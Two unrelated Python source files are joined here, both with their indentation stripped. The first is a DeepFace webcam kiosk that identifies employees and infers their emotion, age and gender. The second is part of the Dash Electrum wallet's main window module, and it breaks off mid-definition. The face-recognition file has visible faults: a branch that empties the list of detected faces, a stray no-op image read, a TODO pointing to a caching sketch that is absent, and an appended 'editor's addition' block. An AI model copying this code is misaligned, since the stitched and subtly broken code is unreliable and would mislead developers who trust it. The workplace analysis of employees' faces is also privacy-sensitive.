realtime.py
import os
from tqdm import tqdm
import numpy as np
import pandas as pd
import cv2
import time
import re
import threading
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
from deepface import DeepFace
from deepface.extendedmodels import Age
from deepface.commons import functions, realtime, distance as dst
from deepface.detectors import FaceDetector
employee_lock = threading.Lock()
employee_name_recon = None
is_in_discussion = False
unknown_employee_name = "UNKNOWN"
def analyze_image(image, input_shape, data_frame, detected_faces_final, enable_face_analysis, face_model, face_model_threshold, emotion_model, age_model, gender_model, callback):
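# Runs in a worker thread started from analysis(): for each detected face
# region it optionally performs emotion/age/gender analysis, embeds the face
# crop with face_model and compares it against the precomputed employee
# embeddings in data_frame using each row's distance metric. The outcome is
# reported through callback(recognized, name, emotion) and the global
# is_in_discussion flag is cleared when the function finishes.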
global employee_name_recon
global unknown_employee_name
global is_in_discussion
for detected_face in detected_faces_final:
x = detected_face[0]
y = detected_face[1]
w = detected_face[2]
h = detected_face[3]
# -------------------------------
# apply deep learning for custom_face
custom_face = image[y:y + h, x:x + w]
# -------------------------------
# facial attribute analysis
emotion_label = ""
if enable_face_analysis:
gray_img = functions.preprocess_face(img=custom_face, target_size=(48, 48), grayscale=True,
enforce_detection=False, detector_backend='opencv')
emotion_labels = ['Angry', 'Disgust', 'Fear', 'Happy', 'Sad', 'Surprise', 'Neutral']
emotion_predictions = emotion_model.predict(gray_img)[0, :]
sum_of_predictions = emotion_predictions.sum()
mood_items = []
for i in range(0, len(emotion_labels)):
mood_item = []
emotion_label = emotion_labels[i]
emotion_prediction = 100 * emotion_predictions[i] / sum_of_predictions
mood_item.append(emotion_label)
mood_item.append(emotion_prediction)
mood_items.append(mood_item)
emotion_df = pd.DataFrame(mood_items, columns=["emotion", "score"])
emotion_df = emotion_df.sort_values(by=["score"], ascending=False).reset_index(drop=True)
# emotion_df is sorted by score (descending), so the first row is the dominant emotion
dominant_emotion = emotion_df.iloc[0]
emotion_label = "%s " % (dominant_emotion['emotion'])
highest_emotion_score = dominant_emotion['score'] / 100
# -------------------------------
face_224 = functions.preprocess_face(img=custom_face, target_size=(224, 224),
grayscale=False, enforce_detection=False,
detector_backend='opencv')
age_predictions = age_model.predict(face_224)[0, :]
apparent_age = Age.findApparentAge(age_predictions)
# -------------------------------
gender_prediction = gender_model.predict(face_224)[0, :]
if np.argmax(gender_prediction) == 0:
gender = "W"
elif np.argmax(gender_prediction) == 1:
gender = "M"
# print(str(int(apparent_age))," years old ", dominant_emotion, " ", gender)
analysis_report = str(int(apparent_age)) + " " + gender
print(f"employee analysis: emotion: {emotion_label} ({highest_emotion_score}), {analysis_report}")
# -------------------------------
# face recognition
custom_face = functions.preprocess_face(img=custom_face,
target_size=(input_shape[1], input_shape[0]),
enforce_detection=False, detector_backend='opencv')
# make sure preprocess_face returned a tensor with the expected input shape
if custom_face.shape[1:3] == input_shape:
if data_frame.shape[0] > 0: # if there are images to verify, apply face recognition
img1_representation = face_model.predict(custom_face)[0, :]
# print(freezed_frame," - ",img1_representation[0:5])
def findDistance(row):
distance_metric = row['distance_metric']
img2_representation = row['embedding']
distance = 1000 # initialize very large value
if distance_metric == 'cosine':
distance = dst.findCosineDistance(img1_representation, img2_representation)
elif distance_metric == 'euclidean':
distance = dst.findEuclideanDistance(img1_representation, img2_representation)
elif distance_metric == 'euclidean_l2':
distance = dst.findEuclideanDistance(dst.l2_normalize(img1_representation),
dst.l2_normalize(img2_representation))
return distance
data_frame['distance'] = data_frame.apply(findDistance, axis=1)
data_frame = data_frame.sort_values(by=["distance"])
candidate = data_frame.iloc[0]
employee_name = candidate['employee']
best_distance = candidate['distance']
# print(candidate[['employee', 'distance']].values)
# if True:
if best_distance <= face_model_threshold:
# print(employee_name)
# display_img = cv2.imread(employee_name)
path = os.path.normpath(employee_name)
label = path.split(os.sep)[-2]
employee_lock.acquire()
employee_name_recon = label
employee_lock.release()
print(f"employee recognized: {label}")
# publish something here
callback(True, label, emotion_label)
else:
employee_lock.acquire()
employee_name_recon = unknown_employee_name
employee_lock.release()
callback(False, "unknown", emotion_label)
print("all done!!!")
employee_lock.acquire()
is_in_discussion = False
employee_lock.release()
def generate_image_with_avatar(avatar, image):
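# Composites the frame shown to the user: a white canvas the size of the
# camera image, with the avatar pasted on the left edge (vertically centred)
# and a horizontally shifted crop of the camera image filling the remaining
# width on the right.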
display_img = np.full(image.shape, 255, np.uint8)
avatar_x_pos = [0, avatar.shape[1]]
avatar_y_offset = int((display_img.shape[0] - avatar.shape[0]) / 2)
avatar_y_pos = [avatar_y_offset, avatar_y_offset + avatar.shape[0]]
display_img[avatar_y_pos[0]:avatar_y_pos[1], avatar_x_pos[0]:avatar_x_pos[1]] = avatar
diff_x = display_img.shape[1] - avatar.shape[1]
img_x_pos = [avatar.shape[1], display_img.shape[1]]
img_y_pos = [0, display_img.shape[0]]
img_x_offset = int(avatar.shape[1] / 2)
display_img[img_y_pos[0]:img_y_pos[1], img_x_pos[0]:img_x_pos[1]] =\
image[0:image.shape[0], img_x_offset:img_x_offset + diff_x]
return display_img
def analysis(db_path, avatar_path, model_name='VGG-Face', detector_backend='opencv', distance_metric='cosine',
enable_face_analysis=True, source=0, time_threshold=5, frame_threshold=5, callback=None):
# ------------------------
face_detector = FaceDetector.build_model(detector_backend)
print("Detector backend is ", detector_backend)
# ------------------------
input_shape = (224, 224)
input_shape_x = input_shape[0]
input_shape_y = input_shape[1]
text_color = (255, 255, 255)
employees = []
# check passed db folder exists
if os.path.isdir(db_path):
for r, d, f in os.walk(db_path): # r=root, d=directories, f = files
for file in f:
if ('.jpg' in file):
# exact_path = os.path.join(r, file)
exact_path = r + "/" + file
# print(exact_path)
employees.append(exact_path)
if len(employees) == 0:
print("WARNING: There is no image in this path ( ", db_path, ") . Face recognition will not be performed.")
# ------------------------
if len(employees) > 0:
model = DeepFace.build_model(model_name)
print(model_name, " is built")
# ------------------------
input_shape = functions.find_input_shape(model)
input_shape_x = input_shape[0]
input_shape_y = input_shape[1]
# tuned thresholds for model and metric pair
threshold = dst.findThreshold(model_name, distance_metric)
# ------------------------
# facial attribute analysis models
# default the attribute models so the thread call below stays valid when analysis is disabled
emotion_model = age_model = gender_model = None
if enable_face_analysis:
tic = time.time()
emotion_model = DeepFace.build_model('Emotion')
print("Emotion model loaded")
age_model = DeepFace.build_model('Age')
print("Age model loaded")
gender_model = DeepFace.build_model('Gender')
print("Gender model loaded")
toc = time.time()
print("Facial attibute analysis models loaded in ", toc - tic, " seconds")
# ------------------------
# find embeddings for employee list
tic = time.time()
# -----------------------
pbar = tqdm(range(0, len(employees)), desc='Finding embeddings')
# TODO: why don't we store those embeddings in a pickle file, similar to the find function? (a commented caching sketch follows the embedding loop below)
cv2.imread("")
embeddings = []
# for employee in employees:
for index in pbar:
employee = employees[index]
pbar.set_description("Finding embedding for %s" % (employee.split("/")[-1]))
embedding = []
# preprocess_face returns single face. this is expected for source images in db.
img = functions.preprocess_face(img=employee, target_size=(input_shape_y, input_shape_x),
enforce_detection=False, detector_backend=detector_backend)
img_representation = model.predict(img)[0, :]
embedding.append(employee)
embedding.append(img_representation)
embeddings.append(embedding)
df = pd.DataFrame(embeddings, columns=['employee', 'embedding'])
df['distance_metric'] = distance_metric
toc = time.time()
print("Embeddings found for given data set in ", toc - tic, " seconds")
# -----------------------
pivot_img_size = 112 # face recognition result image
# load avatars
avatars = {}
for file in os.listdir(avatar_path):
full_path = os.path.join(avatar_path, file)
if os.path.isfile(full_path):
avatars[os.path.splitext(file)[0]] = cv2.imread(full_path)
# -----------------------
freeze = False
face_detected = False
face_included_frames = 0  # freeze the screen once a face is detected in frame_threshold consecutive frames
freezed_frame = 0
tic = time.time()
cap = cv2.VideoCapture(source) # webcam
while True:
ret, img = cap.read()
if img is None:
break
# cv2.namedWindow('img', cv2.WINDOW_FREERATIO)
# cv2.setWindowProperty('img', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
raw_img = img.copy()
resolution_x = img.shape[1]
resolution_y = img.shape[0]
top_offset = 50
ellipse_y = int((resolution_y - top_offset) * 0.45)
ellipse_x = int(ellipse_y * 0.85)
ellipse_center = (int(resolution_x / 2), int((resolution_y + top_offset) / 2))
if not freeze:
# faces = face_cascade.detectMultiScale(img, 1.3, 5)
# faces stores list of detected_face and region pair
faces = FaceDetector.detect_faces(face_detector, detector_backend, img, align=False)
if len(faces) == 0:
face_included_frames = 0
else:
faces = []
detected_faces = []
face_index = 0
center_offset = 40
for face, (x, y, w, h) in faces:
# keep only faces that roughly fill the guide ellipse and are centred on it
if ellipse_x * 1.5 < w < ellipse_x * 2 and \
ellipse_center[0] - center_offset < x + w / 2 < ellipse_center[0] + center_offset and \
ellipse_center[1] - center_offset < y + h / 2 < ellipse_center[1] + center_offset:
face_detected = True
if face_index == 0:
face_included_frames = face_included_frames + 1 # increase frame for a single face
#cv2.rectangle(img, (x, y), (x + w, y + h), (67, 67, 67), 1) # draw rectangle to main image
#cv2.putText(img, str(frame_threshold - face_included_frames), (int(x + w / 4), int(y + h / 1.5)),
# cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 255, 255), 2)
detected_face = img[int(y):int(y + h), int(x):int(x + w)] # crop detected face
# -------------------------------------
detected_faces.append((x, y, w, h))
face_index = face_index + 1
# -------------------------------------
global is_in_discussion
if face_detected and face_included_frames >= frame_threshold and not is_in_discussion:
employee_lock.acquire()
is_in_discussion = True
employee_lock.release()
base_img = raw_img.copy()
detected_faces_final = detected_faces.copy()
print("starting thread")
t = threading.Thread(target=analyze_image, args=(base_img, input_shape, df, detected_faces_final, enable_face_analysis, model, threshold, emotion_model, age_model, gender_model, callback))
t.start()
if not is_in_discussion and not faces:
# cv2.putText(img, "Place your face inside the circle", (150, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.50,
# (50, 50, 50), 2)
display_img = generate_image_with_avatar(avatars["up"], img)
elif not is_in_discussion and faces:
cv2.ellipse(img=img, center=ellipse_center,
axes=(ellipse_x, ellipse_y), angle=0, startAngle=0, endAngle=360,
color=(128, 128, 128), thickness=2)
display_img = generate_image_with_avatar(avatars["down"], img)
else:
display_img = generate_image_with_avatar(avatars["welcome"], img)
cv2.imshow('img', display_img)
if cv2.waitKey(1) & 0xFF == ord('q'): # press q to quit
break
# kill open cv things
cap.release()
cv2.destroyAllWindows()
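# ---------------------------------------------------------------------------
# Illustrative usage sketch (editor's addition, not part of the original
# module). The folder names and the callback below are assumptions: db_path
# is expected to hold one sub-folder of .jpg photos per employee, and
# avatar_path must contain images named up.*, down.* and welcome.*, because
# analysis() looks up those keys in its avatar dictionary.
def _example_callback(recognized, name, emotion):
    # recognized is True when the best match is below the model threshold
    print(f"recognized={recognized}, name={name}, emotion={emotion}")


if __name__ == "__main__":
    analysis(db_path="database", avatar_path="avatars",
             model_name="VGG-Face", detector_backend="opencv",
             distance_metric="cosine", enable_face_analysis=True,
             source=0, frame_threshold=5, callback=_example_callback)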
main_window.py
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar, QAction)
import electrum_dash
from electrum_dash import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_dash.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_dash.dash_tx import DashTxError
from electrum_dash.plugin import run_hook
from electrum_dash.i18n import _
from electrum_dash.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum_dash.transaction import Transaction, TxOutput
from electrum_dash.address_synchronizer import AddTransactionException
from electrum_dash.wallet import (Multisig_Wallet, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_dash.version import ELECTRUM_VERSION
from electrum_dash.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_dash.exchange_rate import FxThread
from electrum_dash.simple_config import SimpleConfig
from electrum_dash.logging import Logger
from electrum_dash.paymentrequest import PR_PAID
from electrum_dash.base_crash_reporter import BaseCrashReporter
from electrum_dash.masternode_manager import MasternodeManager
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .masternode_dialog import MasternodeDialog
from .dash_qt import ExtraPayloadWidget
from .protx_qt import create_dip3_tab
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(31)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.setObjectName("main_window_container")
self.masternode_manager = None
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self._old_excepthook = None
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 8))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.dip3_tab = create_dip3_tab(self, wallet)
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
# Disabled until API is stable.
# tabs.addTab(self.create_proposals_tab(), _('Budget Proposals'))
tabs.setMinimumSize(1020, 500)
tabs.setObjectName("main_window_nav_bar")
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.dip3_tab, read_QIcon("tab_dip3.png"), _("&DIP3"), "dip3")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-dash.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+M"), self, self.show_masternode_dialog)
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
# self.connect(self, QtCore.SIGNAL('proposals_changed'), self.proposals_changed)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# 'proposals']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
if getattr(self.wallet.storage, 'backup_message', None):
self.show_warning(self.wallet.storage.backup_message,
title=_('Information'))
if self.network.tor_auto_on and not self.network.tor_on:
self.show_warning(self.network.tor_warn_msg +
self.network.tor_docs_uri_qt, rich_text=True)
self.tabs.currentChanged.connect(self.on_tabs_current_changed)
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Dash Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Dash Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Dash Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Dash Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
@pyqtSlot()
def on_tabs_current_changed(self):
cur_widget = self.tabs.currentWidget()
if cur_widget == self.dip3_tab and not cur_widget.have_been_shown:
cur_widget.on_first_showing()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
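# Shows or hides an optional tab, persists the choice under the
# 'show_<name>_tab' config key, and re-inserts the tab at its original
# position (tab.tab_pos) when it is shown again.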
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'proposals', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
elif event == 'proposals':
self.proposals_changed()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
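# Resolves the OpenAlias configured under the 'alias' config key on a daemon
# thread and emits alias_received_signal once self.alias_info is set.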
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.masternode_manager = MasternodeManager(self.wallet, self.config)
self.dip3_tab.w_model.reload_data()
self.dip3_tab.update_wallet_label()
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once the GUI has been initialized, check whether we want to announce something, since the callback may have been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Dash Electrum Testnet" if constants.net.TESTNET else "Dash Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Dash coins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Dash coins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Dash network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Dash Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
